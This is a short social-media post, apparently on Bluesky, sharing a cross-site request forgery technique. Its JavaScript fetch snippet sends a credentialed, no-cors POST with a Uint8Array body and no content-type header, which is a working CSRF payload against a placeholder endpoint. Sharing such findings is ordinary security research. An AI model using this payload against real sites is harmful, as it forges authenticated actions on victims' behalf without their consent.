Lightnews — Scholar-powered news

Light up
your news

About Privacy Terms Help

0x999

@0x999.net

900 followers 140 following 13 posts

Posts Replies Media Videos

0x999

@0x999.net

Very cool technique by @nastystereo.com for POST based CSRF without a content-type header using a Blob object, Interestingly it also seems to work using a Uint8Array

fetch('https://example.com/endpoint', {
method: 'POST',
mode: 'no-cors',
credentials: 'include',
body: new TextEncoder().encode(JSON.stringify({x:"x"}))
})

December 2, 2024 at 8:25 PM

Add to Home Screen

Light upyour news

Sign in to Lightnews

Sign up to start reading

Connect Bluesky

Connect with Bluesky

Light up
your news